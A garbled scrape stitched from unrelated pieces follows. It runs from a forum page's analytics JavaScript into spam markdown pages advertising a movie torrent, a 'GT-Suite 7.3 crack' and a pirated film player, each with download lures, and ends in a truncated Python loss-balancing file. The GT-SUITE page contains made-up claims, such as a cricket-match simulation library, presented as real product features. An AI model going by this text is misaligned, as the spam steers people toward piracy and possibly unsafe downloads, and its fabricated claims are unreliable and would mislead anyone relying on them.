of them might be lost. Are you sure you want to proceed?","topicMessageSelector":".lia-forum-topic-message-gte-5","focusEditor":false,"hidePlaceholderShowFormEvent":"LITHIUM:hidePlaceholderShowForm","formWrapperSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-form-wrapper","reRenderInlineEditorEvent":"LITHIUM:reRenderInlineEditor","ajaxBeforeSendEvent":"LITHIUM:ajaxBeforeSend:InlineMessageReply","element":"input","clientIdSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","loadAutosaveAction":false,"newPostPlaceholderSelector":".lia-new-post-placeholder","placeholderWrapperSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-placeholder-wrapper","messageId":8842827,"formSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","expandedClass":"lia-inline-message-reply-form-expanded","expandedRepliesSelector":".lia-inline-message-reply-form-expanded","newPostPlaceholderClass":"lia-new-post-placeholder","editorLoadedEvent":"LITHIUM:editorLoaded","replyEditorPlaceholderWrapperCssClass":"lia-placeholder-wrapper","messageActionsClass":"lia-message-actions","cancelButtonSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-button-Cancel-action","isGteForumV5":true,"messageViewWrapperSelector":".lia-threaded-detail-display-message-view","disabledReplyClass":"lia-inline-message-reply-disabled-reply");LITHIUM.Text.set("ajax.reRenderInlineEditor.loader.feedback.title":"Loading...");LITHIUM.AjaxSupport("ajaxOptionsParam":"useLoader":true,"blockUI":"","event":"LITHIUM:reRenderInlineEditor","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","action":"reRenderInlineEditor","feedbackSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","url":" _0:rerenderinlineeditor?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"-FvVUzScxyJ_XXn3gUAc64YpDdRqBF2Y30yxQR7rbfY.");LITHIUM.InlineMessageEditor("ajaxFeebackSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-inline-ajax-feedback","submitButtonSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-button-Submit-action");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:lazyLoadComponent","parameters":"componentId":"messages.widget.emoticons-lazy-load-runner","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","action":"lazyLoadComponent","feedbackSelector":false,"url":" _0:lazyloadcomponent?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"AADTOmzzX6Q_JaM8MduSmNaVgeCTzh9CcBPmJZL8uJQ.");LITHIUM.lazyLoadComponent("selectors":"elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","events":"lazyLoadComponentEvent":"LITHIUM:lazyLoadComponent","misc":"isLazyLoadEnabled":true);;(function($)try const RESOURCE_LINK = 'Community: resourcesLinkClick'; const RESOURCE_EDIT = 'Community: resourcesEditClick'; const RESOURCE_ADD_GROUP = 'Community: resourcesAddGroupClick'; const RESOURCE_ADD_LINK = 'Community: resourcesAddLinkClick'; const RESOURCE_EDIT_GROUP = 'Community: resourcesEditGroup'; const RESOURCE_EDIT_LINK = 'Community: resourcesEditLink'; const RESOURCE_DELETE_GROUP = 'Community: resourcesDeleteGroup'; const RESOURCE_DELETE_LINK = 'Community: resourcesDeleteLink'; if($('.resources-container').length > 0) $('.links-list-item-title-url-container .list-link').on('click', function(e) trackResourceEvents(e.currentTarget,RESOURCE_LINK,true,true); ); $('.resources-header-edit-icon').on('click',function(e) trackResourceEvents(null,RESOURCE_EDIT,false,false); ); $('.add-group-container').on('click',function(e) trackResourceEvents(null,RESOURCE_ADD_GROUP,false,false); ); $(document).on('click', '.group-form .add-link', function(e) trackResourceEvents(null,RESOURCE_ADD_LINK,false,false); ); $(document).on('click', '.group-list-item .group-edit-button', function(e) trackResourceEvents(e.currentTarget,RESOURCE_EDIT_GROUP,true,false); ); $(document).on('click', '.group-list-item .group-delete-button', function(e) trackResourceEvents(e.currentTarget,RESOURCE_DELETE_GROUP,true,false); ); $(document).on('click', '.saved-link__edit', function(e) trackResourceEvents(e.currentTarget,RESOURCE_EDIT_LINK,true,true); ); $(document).on('click', '.saved-link__delete', function(e) trackResourceEvents(e.currentTarget,RESOURCE_DELETE_LINK,true,true); ); catch(ex) console.log(ex); )(LITHIUM.jQuery); ;(function($)tryconst CC_LINKS_TYPE= '0': 'GetAppsBanner', '1': 'GetApps', '2': 'InstallTheApp', '3': 'LaunchTheExperience', '4': 'ManageAccount'; const CONVERSATION_FLAG_TYPE= '-1': '', '0': 'Top Reply', '1': 'Correct Answer', '2': 'Featured', '3': 'Announcement', '4': 'Pinned Reply'; const PAGE_NAME='digitalData.page.pageInfo.pageName';const LANGUAGE='digitalData.page.pageInfo.language';const SITE_SECTION='digitalData.page.pageInfo.siteSection';const COMMUNITY_CATEGORY='digitalData.community.communityInfo.communityCategory';const COMMUNITY_ID='digitalData.community.communityInfo.communityId';const COMMUNITY_TITLE='digitalData.community.communityInfo.communityTitle'; const CONVERSATION_PAGE='Community: conversationPage';//evar203 mapped variablesconst CARD_CREATED_DATE='digitalData.community.communityAttributes.cardCreatedDate';const COUNT_CORRECT_ANSWER='digitalData.community.communityAttributes.countCorrectAnswer';const COMMUNITY_FLAG='digitalData.community.communityInfo.communityFlag'; const COUNT_REPLY='digitalData.community.communityAttributes.countReply'; const RELATED_CONVERSATION_ACTION='relatedConversationClick';const COMMUNITY_DD_PROPERTY='digitalData.community';const CONVERSATION_REPORT='Community: conversationReportClick';const REPLY_REPORT='Community: repliesReportClick';const MARKED_CORRECT='Community: Marked as Correct';const UNMARKED_CORRECT='Community: UnMarked as Correct';const REPLY_MARKED_CORRECT='replyMarkedCorrect';const REPLY_UNMARKED_CORRECT='replyUnmarkedCorrect';const CONVERSATION_FOLLOW='Community: conversationFollowClick';const REPLY_FOLLOW='Community: repliesFollowClick';const CONVERSATION_UNFOLLOW='Community: conversationUnfollowClick';const REPLY_UNFOLLOW='Community: repliesUnfollowClick';const SOPHIA_EVENTS = 'digitalData.sophiaResponse.fromPage';const CC_LINK1 = 'Community: CCD_';const CC_LINK2 = 'Click';const CC_LINK_CLICK = 'ccdLinkClick';const CC_MANAGE_ACCOUNT_CLICK = 'manageAccountLinkClick'; const REC_CONVO_FEEDBACK_SHOWN='digitalData.community.communityAttributes.recConvoFeedbackShown';const CONVERSATION_EDIT='Community: conversationEditClick';const CONVERSATION_VIEW_HISTORY='Community: conversationViewHistoryClick';const CONVERSATION_MOVE_MERGE='Community: conversationMoveMergeClick';const CONVERSATION_SPAM='Community: conversationSpamClick';const CONVERSATION_DELETE='Community: conversationDeleteClick';const CONVERSATION_BAN_USER='Community: conversationBanUserClick';const REPLY_BAN_USER='Community: repliesBanUserClick';const REPLY_SPAM='Community: repliesSpamClick';const REPLY_DELETE='Community: repliesDeleteClick';const REPLY_MOVE_MERGE='Community: repliesMoveMergeClick';const REPLY_VIEW_HISTORY='Community: repliesViewHistoryClick';const REPLY_EDIT='Community: repliesEditClick';const REPLIES_IN_RESPONSE_TO ='Community: repliesInResponseToClick';$.when(promise1).done( function () userProfilePromise.then(trackConversationPageLoad);); function trackConversationPageLoad() //Conversation Page Load Tracking const subject = $('.userStrip').attr('data-message-subject');let messageUid = '8842827';const tempDD = digitalData; let boardId = normalizeBoardId('camera-raw'); let community = normalizeCategoryBoardId(); let contentType = getBoardType(boardId); //track new post success trackNewPostSuccess(community, subject, messageUid); //track merge message success trackMergeSuccess(subject,community,'8842827',contentType); //recover digital data property digitalData = tempDD; const valArr = location.pathname.split('/'); let pageName; let layoutView = 'threaded'; if('ForumTopicPage' === 'IdeaPage') layoutView = 'linear'; //Ideas do not support threaded view so it will always be linear let sortOrder = 'by_date_ascending'=="by_date_ascending"?"Earliest":"Latest"; if(PAGE_LANG!=='en') pageName = location.hostname + ':t5:' + boardId + ':' + 'conversationPage'; else if(valArr && valArr.length > 2) pageName = location.hostname + ':' + valArr[1] + ':' + community + ':' + 'conversationPage'; if(pageName) setDigitalDataProperty(PAGE_NAME, pageName); if(messageUid) setDigitalDataProperty(COMMUNITY_ID, messageUid); setDigitalDataProperty(LANGUAGE, getLocale()); setDigitalDataProperty(SITE_SECTION, CONVERSATION_PAGE); setPrimaryEvent(CONVERSATION_PAGE, 'pageload');let replyCount = 0;if($('.reply-count__text').length > 0) replyCount = $('.reply-count__text').attr('data-reply-count'); let status = ''; let voteCount = 0; if($('.message-status-link').length > 0) status = $('.message-status-link')[0].innerText; if($('#messageKudosCount_').length > 0) voteCount = $('#messageKudosCount_')[0].getAttribute('data-upvote-count'); const correctAnswerCount = $('.correct-answer-div').attr('data-correct-answer-count'); const creationDate = $('.roleTimestamp').attr('data-post-time'); setDigitalDataProperty(CARD_CREATED_DATE, creationDate); //setDigitalDataProperty(COUNT_REPLY, replyCount?replyCount:'0'); setDigitalDataProperty(COUNT_CORRECT_ANSWER, correctAnswerCount?correctAnswerCount:'0'); setDigitalDataProperty(COMMUNITY_CONTENT_TYPE, contentType); setDigitalDataProperty(COMMUNITY_CATEGORY, community); setDigitalDataProperty(COMMUNITY_TITLE, subject); let solnType = $('.conversation-page-container').attr('data-solution-type'); if(parseInt(solnType) 0) solnType = '1'; else if($('#special-reply-pinned').length > 0) solnType = '4'; solnType = CONVERSATION_FLAG_TYPE[solnType]; let flag = solnType; if($('.body-outer-container').attr('data-pin-flag') === "true") if(flag != '') flag = flag + ';Pinned'; else flag = 'Pinned'; if(flag != '') setDigitalDataProperty(COMMUNITY_FLAG, flag); if(document.getElementById('feedback_view_1')) setDigitalDataProperty(REC_CONVO_FEEDBACK_SHOWN, 'true'); dnmsTrackConversationFeedback('render', 'feedback-answer', [messageUid, community, null, 'radio button']); setDigitalDataProperty(FILTERS, [createGPSortInfoObj(sortOrder)]); setDigitalDataProperty(SOPHIA_EVENTS,['CampaignId': relatedConvCampaignId, 'ControlGroupId': relatedConvControlGroupId, 'VariationId': relatedConvVariationId, 'ActionBlockId': relatedConvActionBlockId, 'CampaignId': manageAccountCampaignId, 'ControlGroupId': manageAccountControlGroupId, 'VariationId': manageAccountVariationId, 'ActionBlockId': manageAccountActionBlockId]); captureSnapshot('state'); //dunamis api call dnmsConversationPageRender(community, replyCount, subject, getCommunityCurrentPageNum(), getConversationTags().toString(), messageUid, layoutView, flag, status, voteCount); cleanDigitalDataProperties([SOPHIA_EVENTS]); if ($('.promos-wrapper').length > 0) let promotype = $('.promos-wrapper').attr('data-promotype'); let promosubtype = $('.promos-wrapper').attr('data-promosubtype'); dnmsPromoRender(promotype, promosubtype, community, messageUid); //Track related conversation clickdetectRelatedConversationsLoad(); //track status update success if(localStorage.hasOwnProperty('messageStatusUpdate')) trackStatusUpdateSuccess(); //Track reply post success trackReplyPostSuccess(); let lsCleanUpArr = ['gpEditMessageType', 'gpEditMessagePageNum', 'gpReportMessageDetails', 'gpReportMessageType'];clearStorage(lsCleanUpArr);cleanDigitalDataProperties(['digitalData.primaryEvent.eventInfo', FILTERS]); function getPayload(params) var sophiaPayload = []; try params = params.split("&"); var keyMapping = 'aid':'ActionBlockId','campid':'CampaignId', 'cid':'ContainerId','cgid':'ControlGroupId','tid':'TreatmentId','vid':'VariationId','sid':'SurfaceId'; var sophiaMap = ; for(let i=0;i 1 && (keys[0] in keyMapping)) sophiaMap[keyMapping[keys[0]]] = keys[1]; sophiaPayload.push(sophiaMap); catch(err) console.log(err); return sophiaPayload;function trackNewPostSuccess(communityName, subject, messageUid) const npsDD = localStorage.getItem('npsDigitalData'); if(npsDD) const ddVal = JSON.parse(npsDD);if(subject === ddVal.community.communityInfo.communityTitle) digitalData = ddVal; setDigitalDataProperty(COMMUNITY_ID, messageUid); dnmsNewPostSuccess(communityName, subject, messageUid, JSON.parse(npsDD).sophiaResponse); captureSnapshot('event'); cleanDigitalDataProperties([SOPHIA_EVENTS]); localStorage.removeItem('npsDigitalData');function trackMergeSuccess(subject,community,messageId,contentType) try const mergeMsgDD = localStorage.getItem('mergeMsgDigitalData'); if(mergeMsgDD) const ddVal = JSON.parse(mergeMsgDD); if(messageId === ddVal.community.communityInfo.communityId) digitalData = ddVal; setDigitalDataProperty(COMMUNITY_CATEGORY, community); setDigitalDataProperty('digitalData.community.communityInfo.communityContentTab', contentType); setDigitalDataProperty(COMMUNITY_TITLE, subject); captureSnapshot('event'); let cnvrstnIds = []; let slctdCnvrstnArr = ddVal.community.attributes.selectedConversations; for(let i=0;i 4) messages that got merged if(triggerBy === 'communityPage') dnmsMoveMergeDeleteSuccessClick('Community','Community Controls', 'success', 'Merge', xArr); else if(triggerBy === 'conversationPage') dnmsMoveMergeDeleteSuccessClick('Conversation','Merge Conversation', 'click', 'Merge success', xArr); localStorage.removeItem('moveMergeDeletetriggeredBy'); localStorage.removeItem('mergeMsgDigitalData'); catch(err) console.log(err); function clearStorage(items) for(let x=0; x 0) $('.related-conversations-card').on('click', function(e) if(e.target.hasAttribute('data-related-content-type')) //section tab click events let destinationTab = e.target.getAttribute('data-related-content-type'); dnmsCPSectionTabClick(getDigitalDataProperty(COMMUNITY_CATEGORY), 'related conversation', destinationTab); setPrimaryEvent('Community: relatedConversationLabelClick', SECTION_TAB_ACTION); setDigitalDataProperty(COMMUNITY_CONTENT_TYPE, destinationTab); captureSnapshot('event'); else let subject = e.target.getAttribute('data-related-conversation-subject'); let boardId = e.target.getAttribute('data-related-conversation-board'); let relatedCommContentType = getBoardType(boardId); let community = normalizeCategoryBoardId(); let target_href = e.target.href; let convo_id = e.target.getAttribute('data-related-conversation-id'); let org_convo_id = getDigitalDataProperty(COMMUNITY_ID); dnmsRelatedConversationsClick(community, target_href, org_convo_id, convo_id, "", subject, relatedConvCampaignId, relatedConvControlGroupId, relatedConvVariationId, relatedCommContentType); setPrimaryEvent(RELATED_CONVERSATION_CLICK, RELATED_CONVERSATION_ACTION); cleanDigitalDataProperties([COMMUNITY_DD_PROPERTY]); setDigitalDataProperty(COMMUNITY_CATEGORY, community); setDigitalDataProperty(COMMUNITY_CONTENT_TYPE,relatedCommContentType); setDigitalDataProperty(COMMUNITY_ID, convo_id); setDigitalDataProperty(COMMUNITY_TITLE, subject); setDigitalDataProperty(SOPHIA_EVENTS,['CampaignId': relatedConvCampaignId, 'ControlGroupId': relatedConvControlGroupId, 'VariationId': relatedConvVariationId, 'ActionBlockId': relatedConvActionBlockId]); captureSnapshot('event'); cleanDigitalDataProperties([SOPHIA_EVENTS]); ); //Track actions on conversation and repliesif($('.lia-quilt-column-main_content').length > 0) $('.lia-quilt-column-main_content').on('click', function(e) targetElement.hasClass('delete-message')) trackDeleteMessageClick(targetElement); //Track ban user click if(targetElement.hasClass('ban-user')) trackBanUserClick(targetElement); //Track follow click if(targetElement.hasClass('addMessageUserEmailSubscription')) trackFollowUnfollowClick(targetElement, 'follow'); //Track unfollow click if(targetElement.hasClass('removeMessageUserEmailSubscription')) trackFollowUnfollowClick(targetElement, 'unfollow'); //Track in response to if(targetElement.hasClass('lia-message-reply-in-response-to')) setPrimaryEvent(REPLIES_IN_RESPONSE_TO, REPLY_ACTION); captureSnapshot('event'); dnmsTrackInResponseTo(getConversationPageDetails()); );//Track edit message clickif($('.edit-message').length > 0) $('.edit-message').on('click', function(e) trackEditMessageClick($(e.target)); );//Track mark spam clickif($('.lia-component-spam-action-mark-message-as-spam').length > 0) $('.lia-component-spam-action-mark-message-as-spam').on('click', function(e) trackMarkSpamClick($(e.target)); ); //Track conversation page CC clicksvar ccElements = document.querySelectorAll(".cc-links-cta-container__anchor, .cc-links-banner-p2 a button");for (let i = 0; i < ccElements.length; i++) if($(ccElements[i]).length) $(ccElements[i]).on('click', function(e) let ccType = e.currentTarget.getAttribute('data-type'); let ccurl = e.currentTarget.getAttribute('href'); if(ccType && CC_LINKS_TYPE[ccType]) if (ccType == '4') let primaryEvent = "Community: ManageAccountBtn_Click"; setPrimaryEvent(primaryEvent, CC_MANAGE_ACCOUNT_CLICK); setDigitalDataProperty(SOPHIA_EVENTS,['CampaignId': manageAccountCampaignId, 'ControlGroupId': manageAccountControlGroupId, 'VariationId': manageAccountVariationId, 'ActionBlockId': manageAccountActionBlockId]); captureSnapshot('event'); cleanDigitalDataProperties([SOPHIA_EVENTS]); dnmsManageAccountEvent(getDigitalDataProperty(COMMUNITY_CATEGORY), ccurl, 'ManageAccount', 'click', 'Conversation', manageAccountCampaignId, manageAccountVariationId, manageAccountControlGroupId); else let primaryEvent = CC_LINK1+CC_LINKS_TYPE[ccType]+CC_LINK2; setPrimaryEvent(primaryEvent, CC_LINK_CLICK); captureSnapshot('event'); dnmsCCLinkClick(getDigitalDataProperty(COMMUNITY_CATEGORY), ccurl, CC_LINKS_TYPE[ccType], 'Conversation'); ); function trackFollowUnfollowClick(tElement, action) let isFollowAction = action==='follow'; if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(isFollowAction?CONVERSATION_FOLLOW:CONVERSATION_UNFOLLOW, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick(action, getConversationPageDetails()); else setPrimaryEvent(isFollowAction?REPLY_FOLLOW:REPLY_UNFOLLOW, REPLY_ACTION); let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick(action, replyType, getConversationPageDetails()); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackBanUserClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_BAN_USER, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('ban user', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('ban user', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_BAN_USER, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMarkSpamClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_SPAM, CONVERSATION_ACTION); //dunamis api call let convArray = getConversationPageDetails(); dnmsConversationActionsClick('mark as spam', convArray); if(convArray.length > 1) syncDataOnS3('Spam', convArray[1]); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('mark as spam', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_SPAM, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackDeleteMessageClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_DELETE, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('delete the conversation', getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:originalPost'+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('delete the reply', replyType, getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:'+replyType+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); setPrimaryEvent(REPLY_DELETE, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMoveMergeClick(tElement) localStorage.setItem("movingConversationId", getDigitalDataProperty(COMMUNITY_ID)); if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_MOVE_MERGE, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('move/merge the conversation', getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:originalPost'+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('move/merge the conversation', replyType, getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:'+replyType+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); setPrimaryEvent(REPLY_MOVE_MERGE, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackViewHistoryClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_VIEW_HISTORY, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('view history', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('view history', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_VIEW_HISTORY, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackEditMessageClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_EDIT, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('edit message', getConversationPageDetails()); localStorage.setItem('gpEditMessagePageNum', getCommunityCurrentPageNum()); else let replyType = getReplyType(tElement); if(replyType) localStorage.setItem('gpEditMessagePageNum', getCommunityCurrentPageNum()); dnmsConversationReplyActionsClick('edit message', replyType, getConversationPageDetails()); localStorage.setItem('gpEditMessageType', replyType); setPrimaryEvent(REPLY_EDIT, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackReportClick(tElement) let tempConversationPageDetails = getConversationPageDetails(); tempConversationPageDetails[2] = encodeURIComponent(tempConversationPageDetails[2]); localStorage.setItem('gpReportMessageDetails', tempConversationPageDetails); if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_REPORT, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('report', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('report', replyType, getConversationPageDetails()); localStorage.setItem('gpReportMessageType', replyType); setPrimaryEvent(REPLY_REPORT, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMarkUnmarkCorrectAnswer(action, tElement) let correctFlag = action==='mark correct answer'; setPrimaryEvent(correctFlag?MARKED_CORRECT:UNMARKED_CORRECT, correctFlag?REPLY_MARKED_CORRECT:REPLY_UNMARKED_CORRECT); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); convDetails = getConversationPageDetails(); if(correctFlag) convDetails = setSophiaPayload(convDetails); captureSnapshot('event'); let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick(action, replyType, convDetails); cleanDigitalDataProperties([SOPHIA_EVENTS]);function detectRelatedConversationsLoad() { if($('.personalised-related-conversations').length > 0) let targetNode = $('.personalised-related-conversations')[0]; let config = childList: true ; let callback = function(mutationsList, observer) for(let i=0; i 0) status = $('.message-status-link')[0].innerText; dnmsConversationStatusUpdate('success',getConversationPageDetails(), comment, status); setPrimaryEvent('Community: StatusChanged'+status.replace(' ',''),'conversationStatusUpdated'); setDigitalDataProperty(PRIMARY_FILTER, createGPFilterInfoObj(status, 'statusChange')); captureSnapshot('event'); localStorage.removeItem('messageStatusUpdate'); cleanDigitalDataProperties([PRIMARY_FILTER, FILTERS]); catch(e) console.log(e); function isReplyBodyEmpty() { let result = false; let xNode;if($('.mce-edit-area').length > 0 && $('.mce-edit-area').children().length > 0) { let mceEditAreaiFrames = $('.mce-edit-area').children(); for(let i=0; i 0 && (content[0].hasAttribute('data-mce-bogus') || tinymce.innerHTML === '

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md b/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md deleted file mode 100644 index 9abd8859bc49614f0a08109fdb62dd681da67820..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Dharam Sankat Mein Download Torrent


      DOWNLOAD >>> https://urloso.com/2uyPpb



      - - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md b/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md deleted file mode 100644 index db7859ae24b7d7c708e04803891414312463d414..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md +++ /dev/null @@ -1,36 +0,0 @@ - -

      GT-SUITE 7.3: A Powerful Simulation Tool for Engine and Vehicle Systems

      -

      GT-SUITE is the industry-leading simulation tool with capabilities and libraries aimed at a wide variety of applications and industries. It offers engineers functionalities ranging from fast concept design to detailed system or sub-system/component analyses, design optimization, and root cause investigation[^2^].

      -

      GT-SUITE 7.3 is the latest release of this software, which was launched in March 2023. It includes many new features and improvements, such as:

      -

      gt-suite 7.3 crack


      Download >>> https://urloso.com/2uyRgy



      -
        -
      • Enhanced multi-physics modeling with built-in 3D CFD and 3D FE (thermal and structural) capabilities
      • -
      • Improved productivity tools and user interface
      • -
      • Expanded libraries for electric and electromagnetic devices, chemistry, acoustics, and controls
      • -
      • New applications for exhaust aftertreatment systems (Exothermia suite), motor design and analysis (FEMAG), and cricket game simulation (Cricket library)
      • -
      -

      GT-SUITE 7.3 can be used for a wide range of engine and vehicle systems, such as:

      -
        -
      • Internal combustion engines (spark ignition, compression ignition, dual fuel, etc.)
      • -
      • Hybrid and electric powertrains
      • -
      • Transmission and driveline systems
      • -
      • Thermal management and cooling systems
      • -
      • Fuel injection and combustion systems
      • -
      • Turbocharging and supercharging systems
      • -
      • EGR concepts and variable geometry systems
      • -
      • VVT and camless valve actuation systems
      • -
      • Aftertreatment systems (DOC, DPF, SCR, etc.)
      • -
      • NVH and sound quality analysis
      • -
      • Vehicle dynamics and handling
      • -
      • Aerodynamics and drag reduction
      • -
      • Cricket game simulation (Indian Premier League matches)
      • -
      -

      GT-SUITE 7.3 is available for download from the Gamma Technologies website[^3^]. Users can also access supplemental material such as tutorials, examples, and documents from the same website. GT-SUITE is compatible with MATLAB and Simulink, which allows users to integrate their models with other tools and workflows[^4^]. GT-SUITE is supported on Windows, Linux, and Mac platforms.

      -

      GT-SUITE is used by all major engine manufacturers, and their suppliers, worldwide. It is also widely adopted by academic institutions and research organizations for teaching and research purposes. GT-SUITE has a large and active user community that provides feedback and suggestions for future development. Gamma Technologies also offers training courses, technical support, consulting services, and custom development for GT-SUITE users.

      - -

      GT-SUITE is based on a versatile multi-physics platform that allows users to construct models of general systems based on many underlying fundamental libraries. Users can seamlessly adjust the model fidelity from 0D to 3D calculations, depending on the task and computational resources. Users can also import solid models from CAD to create 1D and 3D models, and perform embedded 3D CFD and 3D FE modeling with all boundary conditions provided by the simulated surrounding complete system.

      -

      -

      GT-SUITE has a fast solver that makes simulations of large and complex systems practical. It also supports distributed computing, which enables users to run multiple simulations in parallel on different machines. GT-SUITE also provides tools for design of experiments (DOE) and optimization, which help users to explore the design space and find optimal solutions. GT-SUITE can also interface with other software tools for data analysis, visualization, and post-processing.

      -

      GT-SUITE is constantly evolving to meet the needs and challenges of the industry. Gamma Technologies collaborates with leading OEMs, suppliers, and research institutions to develop new features and applications for GT-SUITE. Gamma Technologies also organizes annual user conferences and workshops around the world, where users can learn about the latest developments, share their experiences, and network with other GT-SUITE users.

      d5da3c52bf
      -
      -
      \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md b/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md deleted file mode 100644 index 149cc641fdb96b47e5d6d93e8426b9a571a959ac..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md +++ /dev/null @@ -1,10 +0,0 @@ -

      HD Online Player (Main Hoon Surya SINGHAM II 720p)


      Download ✶✶✶ https://urloso.com/2uyOAy



      -
      -Suriya Movies: Stream latest Surya movies, Suriya Tamil movies along with trailers on MX Player in full HD.. Main Hoon Surya Singham 2 (Hindi Dubbed). - -Main Hoon Surya Singham 2 Hindi Dubbed Suriya Movies 2017: Download Surya movies. Download latest Suriya movies in High quality. Suriya Movies in HD Mp4 and Mp3. Main Hoon Surya Singham 2 (Hindi Dubbed). - -Main Hoon Surya Singham 2 Hindi Dubbed Suriya Movies 2017: Download Surya movies. Download 4fefd39f24
      -
      -
      -

      diff --git a/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py b/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py deleted file mode 100644 index 8a0ac8adebab8cdee8f82351965195dc02800d18..0000000000000000000000000000000000000000 --- a/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py +++ /dev/null @@ -1,136 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import typing as tp - -import flashy -import torch -from torch import autograd - - -class Balancer: - """Loss balancer. - - The loss balancer combines losses together to compute gradients for the backward. - Given `y = f(...)`, and a number of losses `l1(y, ...)`, `l2(y, ...)`, with `...` - not having any dependence on `f`, the balancer can efficiently normalize the partial gradients - `d l1 / d y`, `d l2 / dy` before summing them in order to achieve a desired ratio between - the losses. For instance if `weights = {'l1': 2, 'l2': 1}`, 66% of the 